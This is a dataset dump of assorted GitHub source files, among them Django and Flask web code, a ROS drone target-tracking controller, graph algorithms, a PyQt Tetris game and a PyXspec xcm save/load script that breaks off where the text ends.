blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
49d6d7963eb1e7251d939d8c77a74178713656ce | 9148efb07cb949e686b8c1017460526b74c16319 | /topic/migrations/0001_initial.py | be704877ef5a83f8ba906836a1463a856f940208 | [] | no_license | kangsgo/pineapple | af5277144395135bc018552bcef2237a8c1cd011 | d6f95eb1cf3cc30d97157a9b6fe35ad1889f6a82 | refs/heads/master | 2021-01-12T15:52:03.496417 | 2016-10-06T11:47:59 | 2016-10-06T11:47:59 | 70,171,425 | 1 | 0 | null | 2016-10-06T16:20:18 | 2016-10-06T16:20:18 | null | UTF-8 | Python | false | false | 1,422 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-13 05:09
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('comments', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('food', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='FoodTopic',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=32, verbose_name='专题名称')),
('comments', models.ManyToManyField(blank=True, to='comments.Comment', verbose_name='专题评论')),
('foods', models.ManyToManyField(to='food.Food', verbose_name='美食')),
('users_collect', models.ManyToManyField(blank=True, related_name='topics_collected', to=settings.AUTH_USER_MODEL, verbose_name='收藏的用户')),
('users_like', models.ManyToManyField(blank=True, related_name='topics_liked', to=settings.AUTH_USER_MODEL, verbose_name='点赞用户')),
],
options={
'verbose_name': '美食专题',
'verbose_name_plural': '美食专题',
},
),
]
| [
"tonnie.lwt@gmail.com"
] | tonnie.lwt@gmail.com |
1c1ae64bcd0ef9585b622bcc72dcfe53e29a844d | 733a9f7fb141db20c9286e6971d59dc22f1a96c3 | /plot.py | 18aa40480148505fe7216e4af38773a4457eac1f | [] | no_license | MartinBCN/DeepRL | ca888dfe1a22a65abc597f34bd933965d2f86872 | 8394a373936a6fc1b77c1fb6762371f70bac8a1f | refs/heads/main | 2023-04-20T07:34:21.619209 | 2021-05-16T13:07:39 | 2021-05-16T13:07:39 | 361,625,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,499 | py | import streamlit as st
st.set_page_config(page_title='RL Reacher', page_icon=None, layout='wide')
import pandas as pd
import json
from pathlib import Path
import numpy as np
import plotly_express as px
p = Path('runs/reacher')
batch = pd.DataFrame()
epoch = pd.DataFrame()
configs = pd.DataFrame()
for path in p.glob('run*'):
run = path.name
# --- Configs ---
with open(path / 'config.json', 'r') as data:
config = json.load(data)
next_configs = {'Run': [run], 'Hidden Layer': [config['actor']['hidden_layers']],
'Layer Norm': [config['actor']['batch_norm']], 'Dropout': [config['actor']['dropout']]}
configs = pd.concat([configs, pd.DataFrame(next_configs)])
# --- Logs ---
try:
with open(path / 'logs.json', 'r') as data:
logs = json.load(data)
next_batch = pd.DataFrame(logs['batch'])
next_batch['Batch'] = np.arange(len(next_batch))
next_epoch = pd.DataFrame(logs['epoch'])
next_epoch['Epoch'] = np.arange(len(next_epoch))
next_epoch['ScoreRolling'] = next_epoch['score'].rolling(100).mean()
next_epoch['Run'] = run
batch = pd.concat([batch, next_batch])
epoch = pd.concat([epoch, next_epoch])
except:
pass
col1, col2 = st.beta_columns(2)
fig = px.line(epoch, x="Epoch", y="Mean Score", color='Run')
fig.write_html('figures/mean_score.html')
col1.write(fig)
fig = px.line(epoch, x="Epoch", y="score", color='Run')
col2.write(fig)
| [
"martin-cleven@gmx.net"
] | martin-cleven@gmx.net |
6df584caf2711d3e2e7ace2cad2cdc746637d3a9 | 7f591f2c5921a35b1ee86c134e6f76ccbe91eb53 | /login/app/forms.py | 24d77e0c69aec135095db84b303528e5728b3b66 | [] | no_license | prashanthchaduvala/Myproject | cb91f7a6701927a847043c08f0512bc5f8deb2b4 | 2fa04185e7b53154e6b132ed28dfc462cc267929 | refs/heads/master | 2020-09-26T14:33:54.331103 | 2019-12-06T07:59:07 | 2019-12-06T07:59:07 | 226,274,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | from django import forms
from .models import loginpage
class LoginForm(forms.ModelForm):
class Meta:
model=loginpage
fields='__all__'
widgets={'password':forms.PasswordInput} | [
"54631863+prashanthchaduvala@users.noreply.github.com"
] | 54631863+prashanthchaduvala@users.noreply.github.com |
667786d0de27d6e59c028abbd242e1f9687c6d97 | c1a7a020f950e0e80f4b63793eae458a068ed552 | /src/uav_flight/src/python/drone_hunter.py | 806a5ef803b938f65095be34991906460435d4e7 | [] | no_license | Isaac-Seslar/uav_avoidance | 504c4c244a8ae5a1da151f270fa6aa1103400ddb | 5dbef1c9eb527a267f5afd9996a576043413b952 | refs/heads/master | 2023-01-05T04:15:09.082301 | 2020-10-29T16:46:46 | 2020-10-29T16:46:46 | 265,355,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,564 | py | #! /usr/bin/python
####################
# Import libraries #
####################
import math
import numpy as np
import rospy
import mavros
import std_msgs
import tf
import sys, select, os, tty, termios
from geometry_msgs.msg import PoseStamped, TwistStamped, TransformStamped, Point, Vector3
from mavros_msgs.msg import GlobalPositionTarget, State
from mavros_msgs.srv import CommandBool, SetMode, CommandTOL
# Personal def
# from Common_Functions import *
# from Safe_Controller import *
# from Performance_Controller import *
#############
# Class Def #
#############
class obs_obj:
obs_l = Vector3()
obs_s = Vector3()
class quad_obj:
vehicle = Point()
float_x = float()
float_y = float()
float_z = float()
vehicle_dot = Vector3()
float_xdot = float()
float_ydot = float()
float_zdot = float()
state = State()
quad_goal = PoseStamped()
offb_set_mode = SetMode()
arm_cmd = CommandBool()
takeoff_cmd = CommandTOL()
landing_cmd = CommandTOL()
###############
# Definitions #
###############
# Actively watches for keypress #
#################################
def getch():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
# Tolerance function #
######################
def isclose(a, b, rel_tol=1e-09, abs_tol=0.0):
return abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
# Callback functions for local pose #
#####################################
def pose_callback(msg):
quad_obj.vehicle.x = msg.pose.position.x
quad_obj.vehicle.y = msg.pose.position.y
quad_obj.vehicle.z = msg.pose.position.z
quad_obj.float_x = float(msg.pose.position.x)
quad_obj.float_y = float(msg.pose.position.y)
quad_obj.float_z = float(msg.pose.position.z)
def velocity_callback(msg):
quad_obj.vehicle_dot.x = msg.twist.linear.x
quad_obj.vehicle_dot.y = msg.twist.linear.y
quad_obj.vehicle_dot.z = msg.twist.linear.z
quad_obj.float_xdot = float(msg.twist.linear.x)
quad_obj.float_ydot = float(msg.twist.linear.y)
quad_obj.float_zdot = float(msg.twist.linear.z)
def obs_l_callback(msg):
obs_obj.obs_l = msg.transform.translation
def obs_s_callback(msg):
obs_obj.obs_s = msg.transform.translation
def state_callback(st_msg):
quad_obj.state = st_msg
# Generates waypoints for the quadrotor to follow #
###################################################
def mission():
# Defines where the obstacles are on the grid
obstacle_list = np.array([[obs_obj.obs_l.x,obs_obj.obs_l.y],
[obs_obj.obs_s.x,obs_obj.obs_s.y]])
# obstacle_list = np.array([1,1],[2,-1],[3,3])
# Initialize values for RTA_Gate()
current_mode = 0
safe_complete = 0
# Initialize the first waypoint. This will be updated in the loop
cur_wpt = np.array([quad_obj.float_x,quad_obj.float_y])
x_rta = cur_wpt[0]
y_rta = cur_wpt[1]
# Set up tolerances for ending the loop
# x_tol = isclose(quad_obj.float_x, x_targ, abs_tol=0.1)
# y_tol = isclose(quad_obj.float_y, y_targ, abs_tol=0.1)
char = 1
# print char
while not rospy.is_shutdown():
small_obs = np.array([obs_obj.obs_s.x,obs_obj.obs_s.y])
wpt = Performance_Controller(quad_obj.vehicle.x, quad_obj.vehicle.y, small_obs)
quad_obj.quad_goal.pose.position.x = wpt[0]
quad_obj.quad_goal.pose.position.y = wpt[1]
quad_obj.quad_goal.pose.position.z = 1
# x_tol = isclose(quad_obj.float_x, x_targ, abs_tol=0.1)
# y_tol = isclose(quad_obj.float_y, y_targ, abs_tol=0.1)
# print x_rta, quad_obj.float_x, x_targ, x_tol
# print x_tol
setpnt_pub.publish(quad_obj.quad_goal)
rate.sleep()
def Performance_Controller(vehicle_x, vehicle_y, target):
# Compute a line from vehicle to target
slope = (target[1] - vehicle_y)/(target[0] - vehicle_x)
direction = np.sign(target[0] - vehicle_x)
step = 1.0
x_next = vehicle_x + direction*step
if direction > 0 and x_next < target[0]:
x_dif = step
elif direction > 0 and x_next >= target[0]:
x_dif = target[0] - vehicle_x
elif direction < 0 and x_next > target[0]:
x_dif = -step
else:
x_dif = target[0] - vehicle_x
y_next = vehicle_y + slope*x_dif
x_next = vehicle_x + x_dif
return np.array([x_next, y_next])
#########
# Start #
#########
if __name__ == '__main__':
rospy.init_node('RTA_Gate', anonymous=False)
rate = rospy.Rate(50)
# Time setup
now = rospy.Time.now()
zero_time = rospy.Time()
# Subscribers
state_sub = rospy.Subscriber('/mavros1/state', State, state_callback, queue_size=10)
quad_pose_sub = rospy.Subscriber('/mavros1/local_position/pose', PoseStamped,
pose_callback, queue_size=10)
velo_sub = rospy.Subscriber('/mavros1/local_position/velocity', TwistStamped,
velocity_callback, queue_size=10)
obs_l_pose_sub = rospy.Subscriber('/vicon/obs_l/obs_l', TransformStamped,
obs_l_callback, queue_size=10)
obs_s_pose_sub = rospy.Subscriber('/vicon/obs_s/obs_s', TransformStamped,
obs_s_callback, queue_size=10)
# Publishers
setpnt_pub = rospy.Publisher('/mavros1/setpoint_position/local', PoseStamped, queue_size=10)
# velocity_pub = rospy.Publisher('/mavros/setpoint_velocity/cmd_vel', TwistStamped, queue_size=10)
# local_position = rospy.Publisher('/mavros/local_position/pose', PoseStamped)
# Services
setmod_serv = rospy.ServiceProxy('/mavros1/set_mode', SetMode)
arming_serv = rospy.ServiceProxy('/mavros1/cmd/arming', CommandBool)
takeoff_serv = rospy.ServiceProxy('/mavros1/cmd/takeoff', CommandTOL)
landing_serv = rospy.ServiceProxy('/mavros1/cmd/land', CommandTOL)
print "Track?"
choice = raw_input('yes or no: ')
if choice=='no' or choice=='n':
quit()
elif choice=='yes' or choice=='y':
while not rospy.is_shutdown():
setpnt_pub.publish(quad_obj.quad_goal)
rate.sleep()
if quad_obj.state.mode=="OFFBOARD":
if not quad_obj.state.armed==True:
print "Arming..."
rospy.wait_for_service('/mavros1/cmd/arming')
arming_serv(True)
rospy.sleep(2)
print "Taking Off..."
quad_obj.quad_goal.pose.position.x = quad_obj.vehicle.x
quad_obj.quad_goal.pose.position.y = quad_obj.vehicle.y
quad_obj.quad_goal.pose.position.z = 1
for i in range(200):
setpnt_pub.publish(quad_obj.quad_goal)
rate.sleep()
break
print "mission start"
mission() | [
"isaaciscool19@gmail.com"
] | isaaciscool19@gmail.com |
a1a897e0a9c3bc5db171865931e925f1a2a52b18 | 8195596a47e5d47ec78b585d5ed4b1a9583f61f7 | /app.py | 1611a2b6eae0dd07fc9bf0c583d9d41aeb8e9ddf | [] | no_license | acoustically/EchoetServer | 8f5b92a9dff31c2177f0e9b6b700ad257e478447 | 454b90105c87dba04ca3fcfb74466211def94ab7 | refs/heads/master | 2021-07-20T12:03:32.073197 | 2017-10-29T00:04:20 | 2017-10-29T00:04:20 | 108,533,779 | 0 | 1 | null | 2017-10-28T09:48:45 | 2017-10-27T10:40:26 | Python | UTF-8 | Python | false | false | 858 | py | from flask import Flask, request, jsonify, render_template
from src.routes.daily_eat import daily_eat
from src.routes.user import user
from src.routes.food import food
from src.routes.user_body import user_body
app = Flask(__name__)
app.register_blueprint(user, url_prefix="/user")
app.register_blueprint(daily_eat, url_prefix="/daily-eat")
app.register_blueprint(food, url_prefix="/food")
app.register_blueprint(user_body, url_prefix="/user-body")
@app.route("/")
def index():
return render_template("index.html")
@app.route("/user_list")
def user_list():
return render_template("user_list.html")
@app.route("/user_comments")
def user_comments():
return render_template("user_comments.html")
@app.route("/food_list")
def food_list():
return render_template("food_list.html")
if __name__ == "__main__":
app.run(host="0.0.0.0")
| [
"ubuntu@ip-172-31-8-104.ap-northeast-2.compute.internal"
] | ubuntu@ip-172-31-8-104.ap-northeast-2.compute.internal |
44743649534d60a91cc3986c48b9fcb6f15d46bd | 30d61ce0b728f31a830db6b6b1954a32551990b2 | /src/gui_config/custom/util.py | 52c871fa4478b9296be8335390e061416b42f78d | [
"MIT"
] | permissive | hgiesel/anki_set_randomizer | 6755dc8489b703887c55a5427bbbdab858f58a65 | 1a9a22480eb6c0e7f421dc08d36d14920e43dd3e | refs/heads/master | 2022-08-24T05:45:13.339132 | 2020-01-15T17:04:26 | 2020-01-30T13:56:50 | 197,258,760 | 5 | 0 | MIT | 2022-07-20T17:28:42 | 2019-07-16T19:56:27 | JavaScript | UTF-8 | Python | false | false | 90 | py | def mapTruthValueToIcon(b):
if b:
return '✓'
else:
return '✗'
| [
"hengiesel@gmail.com"
] | hengiesel@gmail.com |
0418b38156676b0628df4bd411124a771259d66b | 3d2cf0037809d77f110a1383df4c42c68614487f | /graphs.py | 57b3b1613cca1ca7ddd95f281503e5497f7d49f7 | [] | no_license | zackbrienza/fantasy-football | 469b0a6895a6227ff6c6019cd7748765860dba5a | d483f319292cc596052c08f9ec56902db861bc8b | refs/heads/master | 2021-09-05T17:05:24.018307 | 2018-01-29T21:29:13 | 2018-01-29T21:29:13 | 109,536,608 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,472 | py | #Scott Dickson
#1/3/2018
#Implementations of various graph algorithms
#All take an adjacency list of size n^2 where n is
#the number of vertices in the graph
from Queue import Queue
#Try to find a path fromt the start node to the end node
#If found return a list of edges. Nil will be returned if
#a path cannot be found. if adj[i][j] == 1 then there is a directed
#edge between vertex i and vertex j
def bfs(adj, start, end):
q = Queue()
n = len(adj[0])#Number of nodes
visited = n*[False]
visited[start] = True
q.put(start)
path = []
while not q.empty():
temp = q.get()
visited[temp] = True
if temp == end:
break
for i in range(n):
if adj[temp][i] == 1 and not visited[i]:
q.put(i)
#Path not found
if not visited[end]:
return []
else:
#Backtrack and recover the path
cur = end
bt_visited = n*[False]
while cur != start:
bt_visited[cur] = True
for i in range(n):
if adj[i][cur] == 1 and visited[i] and not bt_visited[i]:
path = [[i,cur]] + path
cur = i
break
return path
#Given a graph, edge capacities and the source/sink node
#Generate a maximum flow assignment of flow on each edge
def ford_fulkerson(adj,cap,s,t):
n = len(adj[0])
flow = [[0 for x in range(n)] for y in range(n)] #No flow on the graph initially
max_flow = False
while not max_flow:
#Find path in the residual graph
path = bfs(makeResidual(adj,flow,cap), s, t)
#Maxiumum flow has been reached
if path == []:
max_flow = True
else:
flow = augment(adj,flow,cap,path)
return flow
#Given a graph, flows and capacities return the residial graph's
#Adjacency list
def makeResidual(adj,flow,cap):
n = len(adj[0])
res = [[0 for x in range(n)] for y in range(n)]
for i in range(n):
for j in range(n):
if adj[i][j] == 1:
if flow[i][j] > 0:
res[j][i] = 1 #add backwards edge
if flow[i][j] < cap[i][j]:
res[i][j] = 1 #Add forward edge
return res
#Update the flow after an augmenting path has been found
def augment(adj,flow,cap,path):
min_diff = 0
for i in range(len(path)):
head = path[i][0]
tail = path[i][1]
if adj[head][tail] == 1:
diff = cap[head][tail] - flow[head][tail]
if min_diff == 0:
min_diff = diff
elif min_diff > diff:
min_diff = diff
elif adj[tail][head] == 1: #Check for backwards edges
diff = flow[head][tail]
if min_diff == 0 or min_diff > diff:
min_diff = diff
#Now add/subtract [min_diff] amount of flow
#from edges in the path
for i in range(len(path)):
head = path[i][0]
tail = path[i][1]
if adj[head][tail] == 1:
flow[head][tail] += min_diff
elif adj[tail][head] == 1:
flow[head][tail] -= min_diff
return flow
#Graph class for easy use and testing
class Graph:
def __init__(self):
self.n = 0
self.adj = []
self.cap = []
def setNodes(self,num):
self.n = num
self.adj = [[0 for x in range(num)] for y in range(num)]
self.cap = [[0 for x in range(num)] for y in range(num)]
def add_edge(self,start,end,c=1):
self.adj[start][end] = 1
self.cap[start][end] = c #Default capacity
def getAdj(self):
return self.adj
def getCap(self):
return self.cap
if __name__ == '__main__':
g = Graph()
g.setNodes(7)
g.add_edge(0,1,3)
g.add_edge(0,2,5)
g.add_edge(1,3,1)
g.add_edge(2,3,2)
g.add_edge(1,4,5)
g.add_edge(3,4,1)
g.add_edge(3,5,3)
g.add_edge(2,5,2)
g.add_edge(4,6,7)
g.add_edge(5,6,3)
print("Adjacency array:")
print(g.getAdj())
print("Capacity array:")
print(g.getCap())
#Test with all edges having cap 1
print("Max flow array:")
print(ford_fulkerson(g.getAdj(),g.getCap(),0,6))
| [
"sdd48@cornell.edu"
] | sdd48@cornell.edu |
4c05a7c1bbc996ad2ea1c67b8c197f53b49ee881 | cf84ec58efa63846d09592a6b3d98f9ba31aba0a | /day01/Interaction.py | 3543fe16091c1ade96d5a645c2634d360ee4d799 | [] | no_license | EvanMi/s14 | cedd3837d0bb87209a31e17467fc723c3b4d7041 | 186d3a471bfc5ac4edc888d1b2d0b65206b62803 | refs/heads/master | 2020-03-30T07:34:47.382925 | 2018-09-30T08:55:10 | 2018-09-30T08:55:10 | 150,950,275 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 624 | py | # -*- coding:utf-8 -*-
# Author: Evan Mi
name = input("name:")
age = int(input("age:"))
job = input("job:")
salary = input("salary:")
# %s %f %d
info = '''
---------- info of %s --------
Name: %s
Age: %d
Job: %s
Salary: %s
''' % (name, name, age, job, salary)
info2 = '''
---------- info of {_name} --------
Name: {_name}
Age: {_age}
Job: {_job}
Salary: {_salary}
'''.format(_name=name, _age=age, _job=job, _salary=salary)
info3 = '''
---------- info of {0} --------
Name: {0}
Age: {1}
Job: {2}
Salary: {3}
'''.format(name, age, job, salary)
print(info)
print(info2)
print(info3)
'''the type of age'''
print(type(age))
| [
"1157015566@qq.com"
] | 1157015566@qq.com |
aa5c179f6a82ed1c371e89ee709949f9a08fcf6f | 7c42e938f896729b04ebb19ed6222083841c66c0 | /tetris/ui.py | a5ac41cc480f2429c5eb5ada0397dd2533269c2d | [
"MIT"
] | permissive | xmye/games | 6586805d94b452a604fe977773a7a1402e704930 | 4239022cf4f144dbf22b46baf51368a408faa97b | refs/heads/master | 2021-04-03T08:56:26.637072 | 2018-03-05T22:01:33 | 2018-03-06T22:01:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,653 | py | from PyQt5.QtCore import Qt, QTimer, QSize, QPointF, QRectF, QPropertyAnimation, QEasingCurve, \
QParallelAnimationGroup, QAbstractAnimation
from PyQt5.QtWidgets import QWidget, QFrame, QMessageBox, QGraphicsScene, QGraphicsView, \
QGraphicsObject, QGridLayout, QStyleOptionGraphicsItem, \
QGraphicsSceneMouseEvent, QGraphicsSceneWheelEvent
from PyQt5.QtGui import QPainter, QPen, QBrush, QColor, QTransform, QResizeEvent, QKeyEvent
from typing import Union
from tetris import Tetris
class QTetris(QWidget):
class QTile(QGraphicsObject):
colorMap = {Tetris.I: QColor("#53bbf4"), Tetris.J: QColor("#e25fb8"),
Tetris.L: QColor("#ffac00"), Tetris.O: QColor("#ecff2e"),
Tetris.S: QColor("#97eb00"), Tetris.T: QColor("#ff85cb"),
Tetris.Z: QColor("#ff5a48")}
def __init__(self, qTetris: 'QTetris', tetrimino: Tetris.Tetrimino, tile: Tetris.Tile):
super(QTetris.QTile, self).__init__()
tile.delegate = self
self.color = self.colorMap[type(tetrimino)]
self.qTetris = qTetris
self.moveAnimation = QParallelAnimationGroup()
self.dropAnimation = QPropertyAnimation(self, b'pos')
self.collapseAnimation = QPropertyAnimation(self, b'pos')
self.shiftAnimation = QPropertyAnimation(self, b'pos')
self.collapseAnimation.finished.connect(lambda tl=tile: tile.delegate.disappeared(tl))
self.qTetris.scene.addItem(self)
self.setPos(QPointF(0, 4))
self.moved(tile)
def moved(self, tile: Tetris.Tile):
translation = QPropertyAnimation(self, b'pos')
start, end = self.pos(), QPointF(tile.row, tile.column)
curve, speed, delay = QEasingCurve.OutBack, 1 / 50, -1
self.animate(translation, start, end, curve, speed, delay)
rotation = QPropertyAnimation(self, b'rotation')
start, end = self.rotation(), tile.rotation
curve, speed, delay = QEasingCurve.OutBack, 1, -1
self.animate(rotation, start, end, curve, speed, delay)
rotation.setDuration(translation.duration())
self.moveAnimation.clear()
self.moveAnimation.addAnimation(translation)
self.moveAnimation.addAnimation(rotation)
self.moveAnimation.start()
def dropped(self, tile: Tetris.Tile):
start, end = self.pos(), QPointF(tile.row, tile.column)
curve, speed, delay = QEasingCurve.OutBounce, 1 / 50, 0
self.animate(self.dropAnimation, start, end, curve, speed, delay)
def collapsed(self, tile: Tetris.Tile):
start, end = self.pos(), QPointF(tile.row, tile.column + 2 * tile.tetris.num_columns)
curve, speed, delay = QEasingCurve.InOutExpo, 1 / 50, 800
if self.dropAnimation.state() == QAbstractAnimation.Running:
start = self.dropAnimation.endValue()
self.animate(self.collapseAnimation, start, end, curve, speed, delay)
def shifted(self, tile: Tetris.Tile):
start, end = self.pos(), QPointF(tile.row, tile.column)
curve, speed, delay = QEasingCurve.OutBounce, 1 / 100, 1200
if self.dropAnimation.state() == QAbstractAnimation.Running:
start = self.dropAnimation.endValue()
self.animate(self.shiftAnimation, start, end, curve, speed, delay)
def disappeared(self, tile: Tetris.Tile):
self.qTetris.scene.removeItem(self)
def paint(self, painter: QPainter, styleOption: QStyleOptionGraphicsItem, widget: QWidget=None):
pen = QPen()
pen.setWidthF(0.05)
pen.setColor(Qt.darkGray)
painter.setPen(pen)
brush = QBrush()
brush.setColor(self.color)
brush.setStyle(Qt.SolidPattern)
painter.setBrush(brush)
topLeft = QPointF(0, 0)
bottomRight = QPointF(1, 1)
rectangle = QRectF(topLeft, bottomRight)
rectangle.translate(-0.5, -0.5)
painter.drawRect(rectangle)
@staticmethod
def animate(animation: QPropertyAnimation, start: Union[QPointF, int, float], end: Union[QPointF, int, float],
curve: QEasingCurve=QEasingCurve.Linear, speed: float=1 / 50, delay: int=-1):
animation.setStartValue(start)
animation.setEndValue(end)
animation.setEasingCurve(curve)
if type(start) == type(end) == QPointF:
distance = (end - start).manhattanLength()
else:
distance = abs(end - start)
animation.setDuration(round(distance / speed))
if delay == 0:
animation.start()
if delay > 0:
QTimer.singleShot(delay, animation.start)
def boundingRect(self):
topLeft = QPointF(0, 0)
bottomRight = QPointF(1, 1)
rectangle = QRectF(topLeft, bottomRight)
rectangle.translate(-0.5, -0.5)
return rectangle
class QScene(QGraphicsScene):
def __init__(self, tetris: Tetris):
super(QTetris.QScene, self).__init__()
self.tetris = tetris
pen = QPen()
pen.setWidthF(0.05)
pen.setColor(Qt.lightGray)
brush = QBrush(Qt.NoBrush)
rect = QRectF(0, 0, tetris.num_rows, tetris.num_columns)
rect.translate(-0.5, -0.5)
self.setSceneRect(rect)
self.addRect(rect, pen, brush)
self.setBackgroundBrush(self.palette().window())
for column in range(0, tetris.num_columns, 2):
pen = QPen(Qt.NoPen)
brush = QBrush(Qt.SolidPattern)
brush.setColor(Qt.lightGray)
topLeft = QPointF(0, column)
bottomRight = QPointF(tetris.num_rows, column + 1)
rectangle = QRectF(topLeft, bottomRight)
rectangle.translate(-0.5, -0.5)
self.addRect(rectangle, pen, brush)
def mouseMoveEvent(self, sceneMouseEvent: QGraphicsSceneMouseEvent):
mousePoint = sceneMouseEvent.scenePos()
mouseRow, mouseColumn = round(mousePoint.x()), round(mousePoint.y())
row, column = self.tetris.falling_tetrimino.row, self.tetris.falling_tetrimino.column
if mouseColumn - column > 0:
self.tetris.move_right()
if mouseColumn - column < 0:
self.tetris.move_left()
def mouseReleaseEvent(self, sceneMouseEvent: QGraphicsSceneMouseEvent):
if sceneMouseEvent.button() == Qt.LeftButton:
self.tetris.drop()
if sceneMouseEvent.button() == Qt.RightButton:
self.tetris.rotate()
def wheelEvent(self, sceneWheelEvent: QGraphicsSceneWheelEvent):
if sceneWheelEvent.delta() > 10:
self.tetris.move_down()
def keyReleaseEvent(self, sceneKeyEvent: QKeyEvent):
if sceneKeyEvent.key() == Qt.Key_Left:
self.tetris.move_left()
if sceneKeyEvent.key() == Qt.Key_Right:
self.tetris.move_right()
if sceneKeyEvent.key() == Qt.Key_Down:
self.tetris.move_down()
if sceneKeyEvent.key() == Qt.Key_Up:
self.tetris.rotate()
class QView(QGraphicsView):
def __init__(self, scene: 'QTetris.QScene'):
super(QTetris.QView, self).__init__()
self.setTransform(QTransform().rotate(+90).scale(+1, -1))
self.setMinimumSize(100, 200)
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setRenderHints(QPainter.Antialiasing)
self.setFrameStyle(QFrame.NoFrame)
self.setMouseTracking(True)
self.setScene(scene)
def __init__(self):
super(QTetris, self).__init__()
self.tetris = None
self.timer = None
self.initGame()
self.view = None
self.scene = None
self.initUI()
self.show()
self.tetris.spawn()
self.timer.start()
def initGame(self):
self.tetris = Tetris()
self.tetris.delegate = self
self.timer = QTimer()
self.timer.setInterval(350)
self.timer.timeout.connect(self.tetris.tick)
def initUI(self):
self.setLayout(QGridLayout())
self.layout().setSpacing(0)
self.layout().setContentsMargins(0, 0, 0, 0)
self.scene = QTetris.QScene(self.tetris)
self.view = QTetris.QView(self.scene)
self.layout().addWidget(self.view)
self.scored(0)
def appeared(self, tetrimino: Tetris.Tetrimino):
for tile in tetrimino:
QTetris.QTile(self, tetrimino, tile)
def scored(self, score: int):
self.setWindowTitle(self.tr("Tetris - {score}").format(score=score))
def terminated(self):
QMessageBox.critical(self, self.tr("Game Over!"), self.tr("You toppped out."), QMessageBox.Ok)
self.tetris.restart()
def resizeEvent(self, resizeEvent: QResizeEvent):
boundingRect = self.scene.itemsBoundingRect()
self.view.fitInView(boundingRect, Qt.KeepAspectRatio)
self.view.centerOn(boundingRect.center())
def sizeHint(self) -> QSize:
return QSize(self.tetris.num_columns * 22, self.tetris.num_rows * 22)
| [
"vojta.molda@gmail.com"
] | vojta.molda@gmail.com |
ffea677591747dfafae0220b0d5104dd324b6948 | 6f45267c7e5e3167bc5c552ff57b1bb934c6911b | /load/save_load_xcm.py | 15c70ceb20f11eed3a16928ec1c8e86f5526a215 | [] | no_license | evandromr/pyxspec | d9c443680dfd508f2c6458157b3ade85b448fb66 | 410f1c457f2671cf11740d3bad4138bd04193939 | refs/heads/master | 2021-01-18T06:45:42.571328 | 2015-07-15T12:24:03 | 2015-07-15T12:24:03 | 39,135,887 | 0 | 1 | null | 2015-07-15T12:36:10 | 2015-07-15T12:36:10 | null | UTF-8 | Python | false | false | 3,891 | py | # pyxspec
def save_as_xcm(filename,s_type="all"):
'''saves stat,method,abund,xsect,cosmo,delta,systematic,model and parameters to an xcm file'''
if len(filename.split("."))>1 and filename.split(".")[-1]=="xcm":
ext=""
else:
ext=".xcm"
fw_xcm=open(filename+ext,"w")
fw_xcm.write("statistic "+str(Fit.statMethod)+"\n")
fw_xcm.write("method "+str(Fit.method)+" "+str(Fit.nIterations)+" "+str(Fit.criticalDelta)+"\n")
fw_xcm.write("abund "+str(Xset.abund)+"\n")
fw_xcm.write("xsect "+str(Xset.xsect)+"\n")
fw_xcm.write("cosmo "+str(Xset.cosmo[0])+" "+str(Xset.cosmo[1])+" "+str(Xset.cosmo[2])+"\n")
fw_xcm.write("xset delta "+str(Fit.delta)+"\n")
fw_xcm.write("systematic "+str(AllModels.systematic)+"\n")
if s_type=="all" or s_type=="files":
ignore_str=""
for x in range(1,AllData.nSpectra+1):
s=AllData(x)
fw_xcm.write("data "+str(x)+":"+str(x)+" "+s.fileName+"\n")
if not s.ignoredString()=="":
ignore_str+=str(x)+":"+s.ignoredString().replace(" ",",")+" "
fw_xcm.write("ignore "+ignore_str+"\n")
if s_type=="all" or s_type=="model":
THEMODEL=AllModels(1)
newpars=""
fw_xcm.write("model "+THEMODEL.expression+"\n")
for n in range(1,AllData.nGroups+1):
c_m=AllModels(n)
for k in range(1,c_m.nParameters+1):
c_p=c_m(k)
if c_p.link=="":
fw_xcm.write(str(c_p.values[0])+" "+str(c_p.values[1])+" "+str(c_p.values[2])+" "+str(c_p.values[3])+" "+str(c_p.values[4])+" "+str(c_p.values[5])+"\n")
else:
param=(c_m.nParameters*(n-1))+k
link=c_p.link
print link,link.split("=")[-1],param,int(link.split("=")[-1])>int(param)
if int(link.split("=")[-1])>int(param):
fw_xcm.write("/\n")
newpars+="newpar "+str(param)+" "+c_p.link+"\n"
else:
fw_xcm.write(c_p.link+"\n")
fw_xcm.write(newpars)
def load_xcm(filename):
'''loads xcm file into pyxspec env'''
model_flag=False
model_param_counter=1
model_num=1
for cmd in open(filename):
cmd=cmd.replace("\n","")
